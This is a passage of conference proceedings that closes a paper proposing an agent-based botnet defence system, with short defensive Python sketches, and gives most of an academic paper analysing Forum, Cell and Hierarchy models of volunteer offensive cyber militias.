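class IDSAgent:
    """Consumes observations from the communication layer and flags suspects."""
    def __init__(self, comms):
        self.comms = comms

    def alerts(self):
        return [o for o in self.comms.drain() if o.get("suspicious")]


comms = CommunicationLayer()
ObserverAgent(comms).report({"host": "10.0.0.5", "suspicious": True})
ObserverAgent(comms).report({"host": "10.0.0.7", "suspicious": False})
print(IDSAgent(comms).alerts())  # only the suspicious observation remains
```

In the actual system the communication layer would span hosts and organisations; the queue here only illustrates the direction of data flow from Observer to IDS.<br />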


Using these layers as our starting point we introduce sub-layers and descriptions as depicted in<br />

Figure 2. We only focus on the Observer and IDS layers.<br />

The observer layer consists of five sub-layers all focusing on gathering information:<br />

Collective Behaviour<br />

Communication Analysis<br />

Resource Gathering<br />

Spreading & Growth Patterns<br />

Network Traffic Analysis<br />

Each of these sub-layers focuses on particular aspects of gathering information through observation.<br />

This observation is conducted through a focused software agent network.<br />

Within network traffic analysis, intensive signature analyses are conducted in order to provide data to<br />

the IDS layer. From these analyses, information on spreading and growth patterns is gathered and<br />

models proposed. Resource gathering focuses on observing specifics such as bandwidth depletion<br />

and resource utilizations. Communication analysis refers to the communications taking place between<br />

bots and masters and the analysis thereof. This will assist in determining the collective behaviour or<br />

focus of the botnet as well as assist in detailing the economic focus.<br />

The information gathered within the observer layer is used as input to the IDS layer. The IDS layer will<br />

function as both a HIDS and a NIDS; that is, it will have operational agents on hosts and servers. The<br />

IDS layer includes the following:<br />

Infiltrate and disable<br />

Spawn Intelligent Software Agent Network<br />

Classification<br />

The information gathered within the observer level is used to classify the botnet; according to this<br />

classification, an intelligent software agent network is spawned to infiltrate and ultimately disable the<br />

botnet.<br />
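The classify-then-spawn flow of the IDS layer might look like the following sketch; the feature names, family labels and agent roles are illustrative assumptions, not taxonomy from this research:<br />

```python
def classify(features):
    """Toy classifier: map observed features to a botnet family label."""
    if features.get("protocol") == "irc":
        return "irc-botnet"
    if features.get("p2p_peers", 0) > 10:
        return "p2p-botnet"
    return "unknown"

# One possible playbook: which agent network to spawn per classification.
PLAYBOOK = {
    "irc-botnet": ["channel-monitor-agent", "sinkhole-agent"],
    "p2p-botnet": ["peer-crawler-agent", "index-poisoning-agent"],
    "unknown": ["passive-monitor-agent"],
}

def spawn_agent_network(observer_report):
    """Classify the observer report, then spawn the prescribed agent network."""
    return PLAYBOOK[classify(observer_report)]

print(spawn_agent_network({"protocol": "irc"}))  # ['channel-monitor-agent', 'sinkhole-agent']
```

The point of the dispatch table is that the response is driven by the classification, so new botnet families can be countered by extending the playbook rather than rewriting the agents.<br />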

Agentification of email client and server software, host and server monitoring software, host and<br />

server firewall and AV software, network monitoring software and user monitoring software is required,<br />

or at least the capability to interface with these applications.<br />

It is anticipated that the crowd sourcing component will function on two layers. Firstly, SA from<br />

different organizations will communicate threats amongst themselves with minimal supervision.<br />

Secondly, information will be sourced from human beings. Both open and proprietary sources should<br />

be used, but two points must be kept in mind. First, the use of proprietary systems will have a<br />

cost implication, and that data may not legally be allowed to propagate through the entire<br />

SA system. Second, the possibility of attack vectors being introduced is a real concern: if crowd<br />

sourcing yields false positives through concerted and purposeful false reporting, then<br />

a DoS attack may occur, with the system’s SA falsely identifying normal activity as malicious and halting it.<br />
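One way to hedge against such poisoned reporting is to weight crowd-sourced verdicts by reporter reputation; in this sketch the threshold, weights and reporter names are arbitrary illustrative values:<br />

```python
def accept_report(reporters, reputation, threshold=2.0, default_weight=0.05):
    """Accept a crowd-sourced 'malicious' verdict only when the
    reputation-weighted vote mass crosses a threshold, so a burst of
    unknown (possibly fake) reporters cannot, by itself, trick the
    SA into halting normal activity."""
    weight = sum(reputation.get(r, default_weight) for r in reporters)
    return weight >= threshold

reputation = {"org-a": 1.0, "org-b": 0.9, "org-c": 0.8}

print(accept_report(["org-a", "org-b", "org-c"], reputation))       # True
print(accept_report([f"fake-{i}" for i in range(20)], reputation))  # False
```

Reputation itself would have to be earned slowly (e.g. from confirmed past reports), otherwise an attacker could farm trusted identities before striking.<br />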

A robust and up-to-date system that can share data on the safety of web sites and software will<br />

mitigate the risk from the primary sources of infection discussed above. In the opinion of the authors,<br />

CYBEX (X.1500) is the correct path to follow in implementing this system.<br />

As part of this research we will implement and test a model of the proposed system against a variety<br />

of botnets. The model will not be comprehensive and will focus on mitigating threats launched via<br />

drive-by downloads and locally installed software. The network of NIDS and HIDS with the crowd<br />

sourcing component will be implemented.<br />

We must also consider the impact of virtualization and the trend towards cloud and grid computing,<br />

which we expect to continue. It is also not intended that this system be entirely automated, as the<br />

effect of systemic failure may be worse than anticipated and human intervention may serve to mitigate<br />

this risk.<br />


In summary, we propose to model and implement a proof-of-concept of an integrated SA botnet<br />

defense system. Challenges in developing such a system include its complexity and the demands of<br />

privacy requirements and laws. Rather than being daunted by these, we believe that the effort will be well<br />

rewarded and will identify future areas of research.<br />

Figure 2: Observer and IDS layers (IDS level: Infiltrate and Disable; Spawn Intelligent Software<br />

Agent Network; Classification. Observer level: Collective Behavior; Communication Analysis;<br />

Resource Gathering; Spreading & Growth Patterns; Network Traffic Analysis)<br />

References<br />

Bailey, M., Cooke, E., Jahanian, F., Xu, Y. & Karir, M. 2009, "A survey of botnet technology and defenses",<br />

Proceedings of the 2009 Cybersecurity Applications & Technology <strong>Conference</strong> for Homeland Security-<br />

Volume 00, IEEE Computer Society, pp. 299.<br />

Bigus, J.P. & Bigus, J. 2001, Constructing intelligent agents using Java, Wiley New York.<br />

Carr, J. & Shepherd, L. 2010, Inside cyber warfare, 1st edn, O'Reilly Media, Inc., Sebastopol, Calif.<br />


Chen, K., Jiang, J., Huang, P., Chu, H., Lei, C. & Chen, W. 2009. Identifying MMORPG Bots: A Traffic Analysis<br />

Approach. EURASIP Journal on Advances in signal Processing. Volume 2009, Article 3.<br />

Chiang, K. & Lloyd, L. 2007. A Case Study of the Rustock Rootkit and Spam Bot. Proceedings of the First<br />

Workshop on Hot Topics in Understanding Botnets, Cambridge, MA.<br />

Cruz, M. 2008, Most Abused Infection Vector. Available: http://blog.trendmicro.com/most-abused-infection-vector/<br />

[9/27/2010].<br />

Damballa Inc. 2009. Update on the Enemy: A deconstruction of who profits from botnets. Available:<br />

http://www.damballa.com/downloads/d_pubs/WP%20Update%20on%20the%20Enemy%20(2009-05-<br />

13).pdf<br />

Dembskey, E. & Biermann, E. 2008, "Software agent framework for computer network operations in IW",<br />

Proceedings of the 3rd International <strong>Conference</strong> On Information Warfare And Security, ed. L. Armistead,<br />

ACL, pp. 127.<br />

Denning, P.J. & Denning, D.E. 2010, "Discussing cyber attack", Commun.ACM, vol. 53, no. 9, pp. 29-31.<br />

Dunham, K. & Melnick, J. 2009, Malicious Bots: An Inside Look Into the Cyber-Criminal Underground of the<br />

Internet, Auerbach Publications.<br />

Jansen van Vuuren, J., Phahlamohlaka, J. & Brazzoli, M. 2010, "The Impact of the Increase in Broadband<br />

Access on South African National Security and the Average citizen", Proceedings of the 5th International<br />

<strong>Conference</strong> on Information Warfare and Security, ed. L. Armistead, ACL , pp. 171.<br />

Knapp, K.J. & Boulton, W.R. 2008, "Ten Information Warfare Trends" in Cyber Warfare and Cyber Terrorism,<br />

eds. Kenneth Knapp & William Boulton, IGI Global, US; Hershey, PA, pp. 17-25.<br />

Li, Z., Liao, Q. & Striegel, A. 2008. Botnet Economics: Uncertainty Matters. Workshop on the Economics of<br />

Information Security (WEIS 2008), London, England.<br />

Li, Z., Goyal, A., Chen, Y. & Paxson, V. 2009. Automating Analysis of Large-Scale Botnet Probing Events.<br />

Proceedings of the 4th International Symposium on Information, Computer and Communications Security.<br />

Sydney, Australia.<br />

Liu, J. 2001, Autonomous agents and multi-agent systems: explorations in learning, self-organization, and<br />

adaptive computation, World Scientific.<br />

Liu, J., Xiao, Y., Ghaboosi, K., Deng, H. & Zhang, J. 2009. Botnet: Classification, Attacks, Detection, Tracing and<br />

Preventive measures. EURASIP Journal on Wireless Communications and Networking, Volume 2009.<br />

Hindawi Publishing Corporation.<br />

Lu, W. Tavallaee, M. & Ghorbani, AA. 2009. Automatic Discovery of Botnet Communities on Large-Scale<br />

Communication Networks. Proceedings of the 4th International Symposium on Information, Computer and<br />

Communications Security. Sydney, Australia.<br />

Masud, MM., Gao, J., Khan, L., Han, J. & Thuraisingham, B. 2008. Peer to Peer Botnet Detection for Cyber-<br />

Security: A Data Mining Approach. In: Proceedings of the 4th annual workshop on Cyber security and<br />

information intelligence research: developing strategies to meet the cyber security and information<br />

intelligence challenges ahead. Oak Ridge, Tennessee.<br />

Microsoft, 2010. Download details: Microsoft Security Intelligence Report volume 8 (July - December 2009).<br />

Available: http://www.microsoft.com/downloads/details.aspx?FamilyID=2c4938a0-4d64-4c65-b951-<br />

754f4d1af0b5&displaylang=en [7/21/2010].<br />

Murch, R. & Johnson, T. 1999, Intelligent software agents, Prentice Hall PTR.<br />

National Research Council (U.S.). Committee on the Role of Information Technology in Responding to Terrorism,<br />

Hennessy, J.L., Patterson, D.A., Lin, H. & National Academies Press 2003, Information technology for<br />

counterterrorism: immediate actions and future possibilities, National Academies Press, Washington, D.C.<br />

OECD (Organization for Economic Co-operation and Development). 2007. Malicious Software (Malware): A<br />

Security Threat to the Internet Community. Ministerial Background Report [Online]. Available:<br />

http://www.oecd.org/dataoecd/53/34/40724457.pdf<br />

Ollmann, G. 2010, "Asymmetrical Warfare: Challenges and Strategies for Countering Botnets", The 5th<br />

International <strong>Conference</strong> on Information Warfare & Security, ACI, Reading, England, pp. 507.<br />

Oram, A. & Viega, J. 2009, Beautiful security, 1st edn, O'Reilly, Sebastopol, CA.<br />

Padgham, L. & Winikoff, M. 2004, Developing intelligent agent systems: a practical guide, Wiley.<br />

Pathak, A., Qian, F., Hu, Y.C., Mao, ZM. & Ranjan, S. 2009. Botnet Spam Campaigns Can Be Long Lasting:<br />

Evidence, Implications, and Analysis. Proceedings of the 11th International Joint <strong>Conference</strong> on<br />

Measurement and Modeling of Computer Systems. SIGMETRICS / Performance'09, June 15-19, 2009,<br />

Seattle, WA.<br />

Porras, P. 2009. Reflections on Conficker: An insider's view of the analysis and implications of the Conficker<br />

conundrum. CACM 52 (10). October.<br />

Prince, B. 2010, Russian Cybercrime: Geeks, Not Gangsters | eWEEK Europe UK. Available:<br />

http://www.eweekeurope.co.uk/knowledge/russian-cybercrime-geeks-not-gangsters-9182/2 [2010,<br />

8/30/2010].<br />

Ramachandran, A. & Feamster, N. 2006. Understanding the Network Level Behavior of Spammers. Proceedings<br />

of the 2006 <strong>Conference</strong> on Applications, Technologies, Architectures and Protocols for Computer<br />

Communications, SIGCOMM’06, September 11-15, 2006, Pisa, Italy.<br />

Schiller, C.A., Binkley, J. & Harley, D. 2007, Botnets: the killer web app, Syngress Media Inc.<br />

Smith, G. 1998, Issues in S and T, Fall 1998, An Electronic Pearl Harbor? Not Likely. Available:<br />

http://www.issues.org/15.1/smith.htm [2010, 8/16/2010].<br />


Stone-Gross, B., Cova, M., Cavallaro, L., Gilbert, B. & Szydlowski, M. 2009. Your Botnet is My Botnet: Analysis<br />

of a Botnet Takeover. Proceedings of the 16th ACM <strong>Conference</strong> on Computer and Communications<br />

Security. CCS’09, November 9–13, 2009, Chicago, Illinois, USA.<br />

Stytz, M.R. & Banks, S.B. 2008, Toward Intelligent Agents For Detecting Cyberattacks.<br />

Thawonmas, R., Kashifuji, Y. & Chen, K. 2008. Detection of MMORPG Bots Based on Behavior Analysis.<br />

Proceedings of the 2008 International <strong>Conference</strong> on Advances in Computer Entertainment Technology.<br />

Yokohama, Japan.<br />

Villamarín-Salomón, R. & Brustoloni, JC. 2009. Bayesian Bot Detection Based on DNS Traffic Similarity.<br />

Proceedings of the 2009 ACM symposium on Applied Computing, SAC’09, March 8-12, 2009, Honolulu,<br />

Hawaii, U.S.A.<br />

Wang, Y., Gu, D., Xu, J. & Du, H. 2009. Hacking Risk Analysis of Web Trojan in Electric Power System. In:<br />

Proceedings of the International <strong>Conference</strong> on Web Information Systems and Mining. Shanghai, China.<br />

Williams, C.W. 2008, Carpet bombing in cyberspace - May 2008 - Armed Forces Journal - Military Strategy,<br />

Global Defense Strategy. Available: http://www.armedforcesjournal.com/2008/05/3375884 [2010,<br />

7/20/2010].<br />

Yampolskiy, RV. & Govindaraju, V. 2008. Embedded Non-interactive Continuous Bot Detection. ACM Computers<br />

in Entertainment, Vol. 5, No. 4, Article 7. Publication Date: March 2008.<br />

Xie, Y., Yu, F., Achan, K., Panigrahy, R., Hulten, G. & Osipkov, I. 2008. Spamming Botnets: Signatures and<br />

Characteristics. Proceedings of the 2008 <strong>Conference</strong> on Applications, Technologies, Architectures and<br />

Protocols for Computer Communications, SIGCOMM’08, August 17–22, 2008, Seattle, Washington.<br />

Theoretical Offensive Cyber Militia Models<br />

Rain Ottis<br />

Cooperative Cyber Defence Centre of Excellence, Tallinn, Estonia<br />

rain.ottis@ccdcoe.org<br />

Abstract. Volunteer based non-state actors have played an important part in many international cyber conflicts of<br />

the past two decades. In order to better understand this threat I describe three theoretical models for volunteer<br />

based offensive cyber militias: the Forum, the Cell and the Hierarchy. The Forum is an ad-hoc cyber militia form<br />

that is organized around a central communications platform, where the members share information and tools<br />

necessary to carry out cyber attacks against their chosen adversary. The Cell model refers to hacker cells, which<br />

engage in politically motivated hacking over extended periods of time. The Hierarchy refers to the traditional<br />

hierarchical model, which may be encountered in government sponsored volunteer organizations, as well as in<br />

cohesive self-organized non-state actors. For each model, I give an example and describe the model’s attributes,<br />

strengths and weaknesses using qualitative analysis. The models are based on expert opinion on different types<br />

of cyber militias that have been seen in cyber conflicts. These theoretical models provide a framework for<br />

categorizing volunteer based offensive cyber militias of non-trivial size.<br />

Keywords: cyber conflict, cyber militia, cyber attack, patriotic hacking, on-line communities<br />

1. Introduction<br />

The widespread application of Internet services has given rise to a new contested space, where<br />

people with conflicting ideals or values strive to succeed, sometimes by attacking the systems and<br />

services of the other side. It is interesting to note that in most public cases of cyber conflict the<br />

offensive side is not identified as a state actor, at least not officially. Instead, it often looks like citizens<br />

take part in hacktivist campaigns or patriotic hacking on their own, volunteering for the cyber front.<br />

Cases like the 2007 cyber attacks against Estonia are a good example where an informal non-state<br />

cyber militia has become a threat to national security. In order to understand the threat posed by<br />

these volunteer cyber militias I provide three models of how such groups can be organized and<br />

analyze the strengths and weaknesses of each.<br />

The three models considered are the Forum, the Cell and the Hierarchy. The models are applicable to<br />

groups of non-trivial size, which require internal assignment of responsibilities and authority.<br />

1.1 Method and limitations<br />

In this paper I use theoretical qualitative analysis in order to describe the attributes, strengths and<br />

weaknesses of three offensively oriented cyber militia models. I have chosen the three plausible<br />

models based on what can be observed in recent cyber conflicts. The term model refers to an abstract<br />

description of relationships between members of the cyber militia, including command, control and<br />

mentoring relationships, as well as the operating principles of the militia.<br />

Note, however, that the description of the models is based on theoretical reasoning and expert<br />

opinion. It offers abstract theoretical models in an ideal setting. There may not be a full match to any<br />

of them in reality or in the examples provided. It is more likely to see either combinations of different<br />

models or models that do not match the description in full. On the other hand, the models should<br />

serve as useful frameworks for analyzing volunteer groups in the current and coming cyber conflicts.<br />

In preparing this work, I communicated with and received feedback from a number of recognized<br />

experts in the field of cyber conflict research. I wish to thank them all for providing comments on my<br />

proposed models: Prof Dorothy Denning (Naval Postgraduate School), Dr Jose Nazario (Arbor<br />

Networks), Prof Samuel Liles (Purdue University Calumet), Mr Jeffrey Carr (Greylogic) and Mr<br />

Kenneth Geers (Cooperative Cyber Defence Centre of Excellence).<br />

2. The forum<br />

The global spread of the Internet allows people to connect easily and form “cyber tribes”, which can<br />

range from benign hobby groups to antagonistic ad-hoc cyber militias. (Williams 2007, Ottis 2008,<br />

Carr 2009, Nazario 2009, Denning 2010) In the case of an ad-hoc cyber militia, the Forum unites like-minded<br />

people who are “willing and able to use cyber attacks in order to achieve a political goal.”<br />


(Ottis 2010b) It serves as a command and control platform where more active members can post<br />

motivational materials, attack instructions, attack tools, etc. (Denning 2010)<br />

This particular model, as well as the strengths and weaknesses covered in this section, are based on<br />

(Ottis 2010b). A good example of this model in recent cyber conflicts is the stopgeorgia.ru forum<br />

during the Russia-Georgia war in 2008 (Carr 2009).<br />

2.1 Attributes<br />

The Forum is an on-line meeting place for people who are interested in a particular subject. I use<br />

Forum as a conceptual term referring to the people who interact in the on-line meeting place. The<br />

technical implementation of the meeting place could take many different forms: web forum, Internet<br />

Relay Chat channel, social network subgroup, etc. It is important that the Forum is accessible over the<br />

Internet and preferably easy to find. The latter condition is useful for recruiting new members and<br />

providing visibility to the agenda of the group.<br />

The Forum mobilizes in response to an event that is important to the members. While there can be a<br />

core group of people who remain actively involved over extended periods of time, the membership<br />

can be expected to surge in size when the underlying issue becomes “hot”. Basically, the Forum is<br />

like a flash mob that performs cyber attacks instead of actions on the streets. As such, the Forum is<br />

more ad-hoc than permanent, because it is likely to disband once the underlying event is settled.<br />

The membership of the Forum forms a loose network centered on the communications platform,<br />

where few, if any, people know each other in real life and the entire membership is not known to any<br />

single person (Ottis 2010b). Most participate anonymously, either providing an alias or by remaining<br />

passive on the communication platform. In general, the Forum is an informal group, although specific<br />

roles can be assumed by individual members. For example, there could be trainers, malware<br />

providers, campaign planners, etc. (Ottis 2010b) Some of the Forum members may also be active in<br />

cyber crime. In that case, they can contribute resources such as malware or use of a botnet to the<br />

Forum.<br />

The membership is diverse, in terms of skills, resources and location. While there seems to be<br />

evidence that a lot of the individuals engaged in such activities are relatively unskilled in cyber attack<br />

techniques (Carr 2009), when supplemented with a few more experienced members the group can be<br />

much more effective and dangerous (Ottis 2010a).<br />

Since most of the membership remains anonymous and often passive on the communications<br />

platform, the leadership roles will be assumed by those who are active in communicating their intent,<br />

plans and expertise. (Denning 2010) However, this still does not allow for strong command and<br />

control, as each member can decide what, if any, action to take.<br />

2.2 Strengths<br />

One of the most important strengths of a loose network is that it can form very quickly. Following an<br />

escalation in the underlying issue, all it takes is a rallying cry on the Internet and within hours or even<br />

minutes the volunteers can gather around a communications platform, share attack instructions, pick<br />

targets and start performing cyber attacks.<br />

As long as there is no need for tightly controlled operations, in terms of timing, resource use and<br />

targeting, there is very little need for management. The network is also easily scalable, as anyone can<br />

join and there is no lengthy vetting procedure.<br />

The diversity of the membership means that it is very difficult for the defenders to analyze and counter<br />

the attacks. The source addresses are likely distributed globally (blacklisting will be inefficient) and<br />

the different skills and resources ensure heterogeneous attack traffic (no easy patterns). In addition,<br />

experienced attackers can use this to conceal precision strikes against critical services and systems.<br />

While it may seem that neutralizing the communications platform (via law enforcement action, cyber<br />

attack or otherwise) is an easy way to neutralize the militia, this may not be the case. The militia can<br />

easily regroup at a different communications platform in a different jurisdiction. Attacking the Forum<br />

directly may actually increase the motivation of the members. (Ottis 2010b)<br />


Last, but not least, it is very difficult to attribute these attacks to a state, as they can (seem to) be a<br />

true (global) grass roots campaign, even if there is some form of state sponsorship. Some states may<br />

take advantage of this fact by allowing such activity to continue in their jurisdiction, blaming legal<br />

obstacles or lack of capability for their inactivity. It is also possible for government operatives to<br />

“create” a “grass roots” Forum movement in support of the government agenda. (Ottis 2009)<br />

2.3 Weaknesses<br />

A clear weakness of this model is the difficulty of commanding and controlling the Forum. Membership is not<br />

formalized and is often not even visible on the communication platform, because passive readers<br />

can just take ideas from there and execute the attacks on their own. This uncoordinated approach can<br />

seriously hamper the effectiveness of the group as a whole. It may also lead to uncontrolled<br />

expansion of conflict, when members unilaterally attack third parties on behalf of the Forum.<br />

A problem with the loose network is that it is often populated with people who do not have experience<br />

with cyber attacks. Therefore, their options are limited to primitive manual attacks or preconfigured<br />

automated attacks using attack kits or malware. (Ottis 2010a) They are highly reliant on instructions<br />

and tools from more experienced members of the Forum.<br />

The Forum is also prone to infiltration, as it must rely on relatively easily accessible communication<br />

channels. If the communication point is hidden, the group will have difficulties in recruiting new<br />

members. The assumption is, therefore, that the communication point can be easily found by both<br />

potential recruits, as well as infiltrators. Since there is no easy way to vet the incoming members,<br />

infiltration should be relatively simple.<br />

Another potential weakness of the Forum model is the presumption of anonymity. If the membership<br />

can be infiltrated and convinced that their anonymity is not guaranteed, they will be less likely to<br />

participate in the cyber militia. Options for achieving this can include “exposing” the “identities” of the<br />

infiltrators, arranging meetings in real life, offering tools that have a phone-home functionality to the<br />

members, etc. Note that some of these options may be illegal, depending on the circumstances. (Ottis<br />

2010b)<br />

3. The cell<br />

Another model for a volunteer cyber force that has been seen is a hacker cell. In this case, the<br />

generic term hacker is used to encompass all manner of people who perform cyber attacks on their<br />

own, regardless of their background, motivation and skill level. It includes the hackers, crackers and<br />

script kiddies described by Young and Aitel (2004). The hacker cell includes several hackers who<br />

commit cyber attacks on a regular basis over extended periods of time. Examples of hacker cells are<br />

Team Evil and Team Hell, as described in Carr (2009).<br />

3.1 Attributes<br />

Unlike the Forum, the Cell members are likely to know each other in real life, while remaining<br />

anonymous to the outside observer. Since their activities are almost certainly illegal, they need to trust<br />

each other. This limits the size of the group and requires a (lengthy) vetting procedure for any new<br />

recruits. The vetting procedure can include proof of illegal cyber attacks.<br />

The command and control structure of the Cell can vary from a clear self-determined hierarchy to a<br />

flat organization, where members coordinate their actions, but do not give or receive orders. In theory,<br />

several Cells can coordinate their actions in a joint campaign, forming a confederation of hacker cells.<br />

The Cells can exist for a long period of time, in response to a long-term problem, such as the Israel-<br />

Palestine conflict. The activity of such a Cell ebbs and flows in accordance with the intensity of the<br />

underlying conflict. The Cell may even disband for a period of time, only to reform once the situation<br />

intensifies again.<br />

Since hacking is a hobby (potentially a profession) for the members, they are experienced with the<br />

use of cyber attacks. One of the more visible types of attacks that can be expected from a Cell is the<br />

website defacement. Defacement refers to the illegal modification of website content, which often<br />

includes a message from the attacker, as well as the attacker’s affiliation. The Zone-H web archive<br />


lists thousands of examples of such activity, as reported by the attackers. Many of the attacks are<br />

clearly politically motivated and identify the Cell that is responsible.<br />

Some members of the Cell may be involved in cyber crime, for example the development,<br />

dissemination, maintenance and use of botnets for criminal purposes. These resources can be used<br />

for politically motivated cyber attacks on behalf of the Cell.<br />

3.2 Strengths<br />

A benefit of the Cell model is that it can mobilize very quickly, as the actors presumably already have<br />

each other’s contact information. In principle, the Cell can mobilize within minutes, although it likely<br />

takes hours or days to complete the process.<br />

A Cell is quite resistant to infiltration, because the members can be expected to establish their hacker<br />

credentials before being allowed to join. This process may include proof of illegal attacks.<br />

Since the membership can be expected to be experienced in cyber attack techniques, the Cell can be<br />

quite effective against unhardened targets. However, hardened targets may or may not be within the<br />

reach of the Cell, depending on their specialty and experience. Prior hacking experience also allows<br />

them to cover their tracks better, should they wish to do so.<br />

3.3 Weaknesses<br />

While a Cell model is more resistant to countermeasures than the Forum model, it does offer potential<br />

weaknesses to exploit. The first opportunity for exploitation is the hacker’s ego. Many of the more<br />

visible attacks, including defacements, leave behind the alias or affiliation of the attacker, in order to<br />

claim the bragging rights. (Carr 2009) This seems to indicate that they are quite confident in their skills<br />

and proud of their achievements. As such, they are potentially vulnerable to personal attacks, such as<br />

taunting or ridiculing in public. Stripping the anonymity of the Cell may also work, as at least some<br />

members could lose their job and face law enforcement action in their jurisdiction. (Carr 2009) As<br />

described by Ottis (2010b), it is probably not necessary to actually identify all the members of the Cell.<br />

Even if the identity of a few of them is revealed or if the corresponding perception can be created<br />

among the membership, the trust relationship will be broken and the effectiveness of the group will<br />

decrease.<br />

Prior hacking experience also presents a potential weakness. Law enforcement is more likely to<br />

know the identity of a hacker, especially one who continues to use the same affiliation or hacker<br />

alias. While there may not be enough evidence, damage or legal basis for law enforcement action in<br />

response to their criminal attacks, politically motivated attacks may fall under a different set of rules<br />

for the local law enforcement.<br />

The last problem with the Cell model is scalability. There are only so many skilled hackers who are<br />

willing to participate in a politically motivated cyber attack. While this number may still overwhelm a<br />

small target, it is unlikely to have a strong effect on a large state.<br />

4. The hierarchy<br />

The third option for organizing a volunteer force is to adopt a traditional hierarchical structure. This<br />

approach is more suitable for government sponsored groups or other cohesive groups that can agree<br />

to a clear chain of command. For example, the People’s Liberation Army of China is known to include<br />

militia-type units in its IW battalions (Krekel 2009). The model can be divided into two generic<br />

sub-models: anonymous and identified membership.<br />

4.1 Attributes<br />

The Hierarchy model is similar in concept to military units, where a unit commander exercises power<br />

over a limited number of sub-units. The number of command levels depends on the overall size of the<br />

organization.<br />

Each sub-unit can specialize in a specific task or role. For example, the list of sub-unit roles can<br />

include reconnaissance, infiltration/breaching, exploitation, malware/exploit development and training.<br />

Depending on the need, there can be multiple sub-units with the same role. Consider the analogy of<br />



Rain Ottis<br />

an infantry battalion, which may include a number of infantry companies, anti-tank and mortar<br />

platoons, a reconnaissance platoon, as well as various support units (communications, logistics), etc.<br />

This specialization and role assignment allows the militia unit to conduct a complete offensive cyber<br />

operation from start to finish.<br />

A Hierarchy model is the most likely option for a state sponsored entity, since it offers a more<br />

formalized and understandable structure, as well as relatively strong command and control ability. The<br />

control ability is important, as the actions of a state sponsored militia are by definition attributable to<br />

the state.<br />

However, a Hierarchy model is not an automatic indication of state sponsorship. Any group that is<br />

cohesive enough to determine a command structure amongst them can adopt a hierarchical structure.<br />

This is very evident in Massively Multiplayer Online Games (MMOG), such as World of Warcraft or<br />

EVE Online, where players often form hierarchical groups (guilds, corporations, etc.) in order to<br />

achieve a common goal. The same approach is possible for a cyber militia as well. In fact, Williams<br />

(2007) suggests that gaming communities can be a good recruiting ground for a cyber militia.<br />

While the state sponsored militia can be expected to have identified membership (though it may still be<br />

anonymous to the outside observer) for control reasons, a non-state militia can consist of<br />

anonymous members that are only identified by their screen names.<br />

4.2 Strengths<br />

The obvious strength of a hierarchical militia is the potential for efficient command and control. The<br />

command team can divide the operational responsibilities to specialized sub-units and make sure that<br />

their actions are coordinated. However, this strength may be wasted by incompetent leadership or<br />

other factors, such as overly restrictive operating procedures.<br />

A hierarchical militia may exist for a long time even without ongoing conflict. During “peacetime”, the<br />

militia’s capabilities can be improved with recruitment and training. This degree of formalized<br />

preparation with no immediate action in sight is something that can set the hierarchy apart from the<br />

Forum and the Cell.<br />

If the militia is state sponsored, then it can enjoy state funding, infrastructure, as well as cooperation<br />

from other state entities, such as law enforcement or the intelligence community. This would allow the<br />

militia to concentrate on training and operations.<br />

4.3 Weaknesses<br />

A potential issue with the Hierarchy model is scalability. Since this approach requires some sort of<br />

vetting or background checks before admitting a new member, it may be time consuming and<br />

therefore slow down the growth of the organization.<br />

Another potential issue with the Hierarchy model is that by design there are key persons in the<br />

hierarchy. Those persons can be targeted by various means to ensure that they will not be effective or<br />

available during a designated period, thus diminishing the overall effectiveness of the militia. A<br />

hierarchical militia may also have issues with leadership if several people contend for prestigious<br />

positions. This potential rift in the cohesion of the unit can potentially be exploited by infiltrator agents.<br />

Any activities attributed to the state sponsored militia can further be attributed to the state. This puts<br />

heavy restrictions on the use of a cyber militia “during peacetime”, as the legal framework surrounding<br />

state use of cyber attacks is currently unclear. However, in a conflict scenario, the state attribution is<br />

likely not a problem, because the state is party to the conflict anyway. This means that a state<br />

sponsored offensive cyber militia is primarily useful as a defensive capability between conflicts. Only<br />

during conflict can it be used in its offensive role.<br />

While a state sponsored cyber militia may be more difficult (but not impossible) to infiltrate, they are<br />

vulnerable to public information campaigns, which may lead to low public and political support,<br />

decreased funding and even official disbanding of the militia. On the other hand, if the militia is not<br />

state sponsored, then it is prone to infiltration and internal information operations similar to those<br />

considered for the Forum model.<br />




Of the three models, the hierarchy probably takes the longest to establish, as the chain of command<br />

and role assignments get settled. During this process, which could take days, months or even years,<br />

the militia is relatively inefficient and likely not able to perform any complex operations.<br />

5. Comparison<br />

When analyzing the three models, it quickly becomes apparent that there are some aspects that are<br />

common to all of them. First, they are not constrained by location. While the Forum and the Cell are by<br />

default dispersed, even a state sponsored hierarchical militia can operate from different locations.<br />

Second, since they are organizations consisting of humans, one of the more potent ways to<br />

neutralize cyber militias is through information operations, such as persuading them that their<br />

identities have become known to the law enforcement, etc.<br />

Third, all three models benefit from a certain level of anonymity. However, this also makes them<br />

susceptible to infiltration, as it is difficult to verify the credentials and intent of a new member.<br />

On the other hand, there are differences as well. Only one model lends itself well to state sponsored<br />

entities (hierarchy), although, in principle, it is possible to use all three approaches to bolster the<br />

state’s cyber power.<br />

The requirement for formalized chain of command and division of responsibilities means that the initial<br />

mobilization of the Hierarchy can be expected to take much longer than the more ad-hoc Forum or<br />

Cell. In the case of short conflicts, this puts the Hierarchy model at a disadvantage.<br />

Then again, the Hierarchy model is more likely to adopt a “peace time” mission of training and<br />

recruitment in addition to the “conflict” mission, while the other two options are more likely to be<br />

mobilized only in time of conflict. This can offset the Hierarchy’s slow initial formation, if<br />

the Hierarchy is established well before the conflict.<br />

While the Forum can rely on their numbers and use relatively primitive attacks, the Cell is capable of<br />

more sophisticated attacks due to their experience. The cyber attack capabilities of the Hierarchy,<br />

however, can range from trivial to complex.<br />

It is important to note that the three options covered here can be combined in many ways, depending<br />

on the underlying circumstances and the personalities involved.<br />

Conclusion<br />

Politically motivated cyber attacks are becoming more frequent every year. In most cases these cyber<br />

conflicts involve offensive non-state actors formed, often spontaneously, from volunteers. Therefore, it is<br />

important to study these groups.<br />

I have provided a theoretical way to categorize non-trivial cyber militias based on their organization.<br />

The three theoretical models are the Forum, the Cell and the Hierarchy. In reality, a pure form of<br />

any of these is unlikely to be seen, as different groups can include aspects of several models. However, the<br />

strengths and weaknesses identified should serve as useful guides to dealing with the cyber militia<br />

threat.<br />

Disclaimer: The opinions expressed here should not be interpreted as the official policy of the<br />

Cooperative Cyber Defence Centre of Excellence or the North Atlantic Treaty Organization.<br />

References<br />

Carr, J. (2009) Inside Cyber Warfare. Sebastopol: O'Reilly Media.<br />

Denning, D. E. (2010) “Cyber Conflict as an Emergent Social Phenomenon.” In Holt, T. & Schell, B. (Eds.)<br />

